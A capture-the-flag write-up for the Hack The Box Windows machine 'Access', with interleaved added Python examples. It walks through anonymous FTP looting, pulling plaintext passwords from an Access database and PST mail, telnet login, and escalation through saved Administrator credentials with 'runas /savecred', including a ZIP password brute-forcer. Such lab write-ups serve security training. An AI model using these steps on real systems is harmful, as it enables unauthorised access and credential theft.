HTB Writeup: Access
Posted on Fri 01 February 2019 in Writeups
OS | Windows
Author | egre55
Difficulty | Easy
Points | 20
Released | 20-09-2018
IP | 10.10.10.98
Summary
Writeup of the 20-point Hack The Box machine Access. A clever Windows box that requires a lot of enumeration. The user flag is obtained after extracting unprivileged user credentials from a Microsoft Access database. Then, using cached credentials, the root flag (and access to the privileged user) is unlocked.
Reconnaissance
Basic enumeration with nmap revealed only 3 open ports - all TCP.
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
23/tcp open telnet Microsoft Windows XP telnetd (no more connections allowed)
80/tcp open http Microsoft IIS httpd 7.5
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
From the banners I saw that all services introduce themselves as Windows programs.
Visiting the http service gave me only a view of some server room.
I checked another service - FTP - which allowed anonymous access (read only).
root@kali:~/HTB_machines/10.10.10.98# ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
226 Transfer complete.
ftp> cd Backups
250 CWD command successful.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 1.56 secs (3.4484 MB/s)
ftp> cd ../Engineer
250 CWD command successful.
ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18 01:16AM 10870 Access Control.zip
226 Transfer complete.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
150 Opening BINARY mode data connection.
226 Transfer complete.
10870 bytes received in 0.04 secs (249.7056 kB/s)
ftp> bye
221 Goodbye.
There were two directories available, containing two files: backup.mdb (Microsoft Access Database) and Access Control.zip (ZIP file, password protected).
root@kali:~/HTB_machines/10.10.10.98# unzip Access\ Control.zip
Archive: Access Control.zip
skipping: Access Control.pst unsupported compression method 99
root@kali:~/HTB_machines/10.10.10.98# 7z l -slt Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,
4 CPUs Westmere E56xx/L56xx/X56xx (IBRS update) (206C1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Listing archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
----------
Path = Access Control.pst
Folder = -
Size = 271360
Packed Size = 10678
Modified = 2018-08-24 02:13:52
Created = 2018-08-24 01:44:57
Accessed = 2018-08-24 01:44:57
Attributes = A
Encrypted = +
Comment =
CRC = 1D60603C
Method = AES-256 Deflate
Host OS = FAT
Version = 20
Volume Index = 0
Exploitation
The password required to extract the zip file was hidden in the backup.mdb database. It could be obtained in at least two ways.
One is a double brute force :) - dump all strings from the database (since it was neither encrypted nor especially large) and then try each of them as the password.
The other approach is to read the database, guess which table contains the interesting data (quite an obvious one) and try those values as the password (far fewer tries - no need to automate). The perfect tool for fiddling with Microsoft Access Database files is mdbtools.
root@kali:~/HTB_machines/10.10.10.98# mdb-tables backup.mdb
acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset
acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup
acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport
att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message
auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption
base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource
base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin
DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES
FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept
LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype
personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY
TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea
UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg
ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE
base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH
UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard
TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt
CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx
root@kali:~/HTB_machines/10.10.10.98# mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
root@kali:~/HTB_machines/10.10.10.98# 7z e -padmin Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,
4 CPUs Westmere E56xx/L56xx/X56xx (IBRS update) (206C1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
ERROR: Wrong password : Access Control.pst
Sub items Errors: 1
Archives with Errors: 1
Sub items Errors: 1
root@kali:~/HTB_machines/10.10.10.98# 7z e -paccess4u@security Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Westmere E56xx/L56xx/X56xx (IBRS update) (206C1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
Would you like to replace the existing file:
Path: ./Access Control.pst
Size: 0 bytes
Modified: 2018-08-24 02:13:52
with the file from archive:
Path: Access Control.pst
Size: 271360 bytes (265 KiB)
Modified: 2018-08-24 02:13:52
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? Y
Everything is Ok
Size: 271360
Compressed: 10870
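The first, automated approach described above (dump every string the database file contains, then try each one as the archive password) as an added Python example; it is not code from the writeup. The password check shells out to `7z t`, which is assumed to be on PATH (exit status 0 means the archive tested clean); the bytes in SAMPLE_MDB_BYTES are a constructed stand-in for a database file, not the real backup.mdb.

```python
"""Dump printable strings from an (unencrypted) Access .mdb and try each one as a ZIP password.

Added example, not code from the writeup. The checker uses `7z t`, assumed to be on PATH.
"""
import re
import subprocess
import sys
from pathlib import Path
from typing import Callable, Iterable, List, Optional

# Printable ASCII runs, as the `strings` utility reports them.
_ASCII_RUN = re.compile(rb"[\x20-\x7e]+")
# Jet/Access also stores text as UTF-16LE; catch runs of "char NUL char NUL ...".
_UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00)+")

# Constructed stand-in for a database file: a few cells of an auth_user-like table
# plus binary padding. Not the real backup.mdb.
SAMPLE_MDB_BYTES = (
    b"\x00\x01junk\x00admin\x00engineer\x00access4u@security\x00\x00"
    + "backup_admin".encode("utf-16le")
    + b"\x00\x00" + b"x" * 100
)


def extract_strings(blob: bytes, min_len: int = 6) -> List[str]:
    """Return every ASCII or UTF-16LE run of at least min_len characters, ASCII hits first."""
    found: List[str] = []
    for m in _ASCII_RUN.finditer(blob):
        if len(m.group()) >= min_len:
            found.append(m.group().decode("ascii"))
    for m in _UTF16_RUN.finditer(blob):
        text = m.group().decode("utf-16le")
        if len(text) >= min_len:
            found.append(text)
    return found


def candidate_passwords(blob: bytes, min_len: int = 6, max_len: int = 64) -> List[str]:
    """Deduplicate the dumped strings (first occurrence wins); drop runs too long to be a password."""
    seen = set()
    out: List[str] = []
    for s in extract_strings(blob, min_len):
        s = s.strip()
        if min_len <= len(s) <= max_len and s not in seen:
            seen.add(s)
            out.append(s)
    return out


def sevenzip_tester(archive: Path) -> Callable[[str], bool]:
    """Build a checker that asks 7-Zip to test the archive with a given password."""
    def check(password: str) -> bool:
        proc = subprocess.run(
            ["7z", "t", "-y", f"-p{password}", str(archive)],
            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
        )
        return proc.returncode == 0  # 7z exits non-zero on "Wrong password"
    return check


def try_passwords(candidates: Iterable[str], check: Callable[[str], bool]) -> Optional[str]:
    """Return the first candidate the checker accepts, or None if none worked."""
    for password in candidates:
        if check(password):
            return password
    return None


if __name__ == "__main__":
    if len(sys.argv) == 3:  # usage: script.py backup.mdb "Access Control.zip"
        words = candidate_passwords(Path(sys.argv[1]).read_bytes())
        hit = try_passwords(words, sevenzip_tester(Path(sys.argv[2])))
        print(f"{len(words)} candidates tried, hit: {hit}")
    else:
        print(candidate_passwords(SAMPLE_MDB_BYTES))
```

The UTF-16 pass matters for Access files: Jet stores many text fields as UTF-16LE, which a plain ASCII `strings` run reports as isolated single characters and would miss entirely.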
As a result I obtained a Personal Storage Table - in other words, a mail archive from Microsoft Outlook. In order to parse it on Linux I used another cool tool - libpst.
root@kali:~/HTB_machines/10.10.10.98# readpst -o Mails -D -j 4 -r -tea -u -w -m Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
root@kali:~/HTB_machines/10.10.10.98# ls Mails/Access\ Control/
2.eml 2.msg
root@kali:~/HTB_machines/10.10.10.98# cat Mails/Access\ Control/2.eml
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
(...)
Content-Type: text/plain; charset="utf-8"
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
(...)
It contained some credentials. I checked whether they were valid with telnet - they were. And from this account the user flag was visible.
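Parsing the .eml that readpst produced, as an added Python example (not the writeup's code and not part of libpst): it reads the message with the standard library's email parser, decodes the text body with its declared charset, and flags lines that hand out a password, which is the kind of check a defender would run over a recovered mail archive. SAMPLE_EML is constructed to match the message shown above; the two regular expressions are my own and cover only the phrasings noted in the comments.

```python
"""Parse a readpst-generated .eml and flag lines that disclose an account password.

Added example, not the writeup's code or libpst's. Standard library only.
"""
import re
from email.message import Message
from email.parser import BytesParser
from typing import Dict, List, Optional

# Constructed sample: same headers and body as the message recovered from the PST.
SAMPLE_EML = (
    b"Status: RO\n"
    b"From: john@megacorp.com <john@megacorp.com>\n"
    b'Subject: MegaCorp Access Control System "security" account\n'
    b"To: 'security@accesscontrolsystems.com'\n"
    b"Date: Thu, 23 Aug 2018 23:44:07 +0000\n"
    b'Content-Type: text/plain; charset="utf-8"\n'
    b"\n"
    b"Hi there,\n\n"
    b"The password for the \xe2\x80\x9csecurity\xe2\x80\x9d account has been changed to "
    b"4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.\n\n"
    b"Regards,\nJohn\n"
)

_QUOTE = "\"'\u201c\u201d"  # straight and curly quotes around an account name or secret
# "The password for the "X" account has been changed to Y."
_CHANGED_TO = re.compile(
    rf"password\s+for\s+(?:the\s+)?[{_QUOTE}]?(?P<account>[\w.@-]+)[{_QUOTE}]?\s+account\s+"
    rf"(?:has\s+been\s+|was\s+|is\s+)?(?:changed|set|reset)\s+to\s+(?P<secret>\S+?)(?=[.,;!]?(?:\s|$))",
    re.IGNORECASE,
)
# Generic "password is Y", "password: Y", "password = Y" forms.
_PASSWORD_IS = re.compile(
    rf"\b(?:password|passwd|pwd)(?:\s+is\s*[:=]?|\s*[:=])\s*[{_QUOTE}]?(?P<secret>\S+?)[{_QUOTE}]?(?=[.,;!]?(?:\s|$))",
    re.IGNORECASE,
)


def parse_eml(raw: bytes) -> Message:
    """Parse RFC 822 bytes; compat32 policy keeps headers as plain strings."""
    return BytesParser().parsebytes(raw)


def body_text(msg: Message) -> str:
    """Decode every text/plain part with its declared charset (utf-8 in the sample)."""
    chunks = []
    for part in msg.walk():
        if part.get_content_type() != "text/plain":
            continue
        payload = part.get_payload(decode=True) or b""
        chunks.append(payload.decode(part.get_content_charset() or "ascii", errors="replace"))
    return "\n".join(chunks)


def find_disclosures(text: str) -> List[Dict[str, Optional[str]]]:
    """Return each line that appears to hand out a password, with the account (if named) and secret."""
    hits: List[Dict[str, Optional[str]]] = []
    for line in text.splitlines():
        m = _CHANGED_TO.search(line)
        if m:
            hits.append({"account": m.group("account"), "secret": m.group("secret"), "line": line.strip()})
            continue
        m = _PASSWORD_IS.search(line)
        if m:
            hits.append({"account": None, "secret": m.group("secret"), "line": line.strip()})
    return hits


def summarize(raw: bytes) -> Dict[str, object]:
    """Headers worth logging plus any credential disclosures found in the body."""
    msg = parse_eml(raw)
    return {
        "from": msg["From"], "to": msg["To"], "subject": msg["Subject"], "date": msg["Date"],
        "disclosures": find_disclosures(body_text(msg)),
    }


if __name__ == "__main__":
    info = summarize(SAMPLE_EML)
    print(info["subject"], "|", info["date"])
    for hit in info["disclosures"]:
        print(f"account={hit['account']} secret={hit['secret']}")
```

Point it at the files readpst writes (`Mails/Access Control/*.eml`) by reading each with `Path(...).read_bytes()` and passing the result to `summarize`.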
root@kali:~/HTB_machines/10.10.10.98# telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>type Desktop\user.txt
fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX8
Post exploitation
During this phase I ran several checks (I really need to shape up my Windows skills), the usual stuff: checking services, installed programs, known system vulnerabilities. I even looked through every .exe file present :). And finally, at some point, I issued the right command:
C:\Users\security>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
So cmdkey is a command present in Windows since Windows 2003 and allows interacting with stored credentials.
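An added Python example, not the writeup's code, showing the defender's side of the same finding: parse the text that `cmdkey /list` prints and report any saved credential whose user is a privileged account, since such an entry is exactly what a later `runas /savecred` can consume. SAMPLE_CMDKEY_OUTPUT is constructed in the layout cmdkey uses; its first entry mirrors the one found on the box, the second is made up to show a non-privileged generic credential. The set of privileged names and the `extra_privileged` parameter are my own choices.

```python
"""Audit `cmdkey /list` output for saved credentials belonging to privileged accounts.

Added example, not the writeup's code. The sample output is constructed.
"""
import re
from typing import Dict, Iterable, List

# Constructed: first entry as on the box, second entry invented (non-privileged).
SAMPLE_CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: alice
"""

# Account names that should never have a password cached for interactive re-use (my choice).
PRIVILEGED_ACCOUNTS = {"administrator", "admin", "root"}

_FIELD = re.compile(r"^(Target|Type|User):\s*(.*)$")


def parse_cmdkey_list(text: str) -> List[Dict[str, str]]:
    """Split cmdkey's Target/Type/User blocks into dicts; each Target line starts a new entry."""
    entries: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in text.splitlines():
        m = _FIELD.match(raw.strip())
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "target" and current:
            entries.append(current)
            current = {}
        current[key] = value
    if current:
        entries.append(current)
    return entries


def account_name(user: str) -> str:
    """Strip DOMAIN\\ or @domain qualifiers: 'ACCESS\\Administrator' -> 'administrator'."""
    return user.split("\\")[-1].split("@")[0].lower()


def audit_stored_credentials(text: str, extra_privileged: Iterable[str] = ()) -> List[Dict[str, str]]:
    """Return the entries whose user is a privileged account, annotated with the credential kind."""
    watch = PRIVILEGED_ACCOUNTS | {name.lower() for name in extra_privileged}
    findings: List[Dict[str, str]] = []
    for entry in parse_cmdkey_list(text):
        if account_name(entry.get("user", "")) not in watch:
            continue
        kind = entry.get("target", "").split("=", 1)[0]  # e.g. "Domain:interactive"
        findings.append({**entry, "kind": kind})
    return findings


if __name__ == "__main__":
    for f in audit_stored_credentials(SAMPLE_CMDKEY_OUTPUT):
        print(f"{f['kind']:20} {f['type']:16} {f['user']}")
```

On a live host, capture `cmdkey /list` to a file and feed its contents to `audit_stored_credentials`; pass the names of your own high-privilege accounts (domain admins, service accounts) through `extra_privileged`.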
Privilege escalation
Knowing the attack vector, I decided to list the content of root.txt.
c:\xyz>runas /user:ACCESS\Administrator /env /savecred "cmd /c dir c:\users\Administrator\Desktop >c:\xyz\out""
c:\xyz>type out
Volume in drive C has no label.
Volume Serial Number is 9C45-DBF0
Directory of c:\users\Administrator\Desktop
08/25/2018 10:54 PM <DIR> .
08/25/2018 10:54 PM <DIR> ..
08/21/2018 11:07 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 16,715,423,744 bytes free
c:\xyz>runas /user:ACCESS\Administrator /env /savecred "cmd /c type c:\users\Administrator\Desktop\root.txt >c:\xyz\out""
c:\xyz>type out
6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXf
In a similar way it is possible to run any other command as Administrator - for example a reverse shell.
Voilà.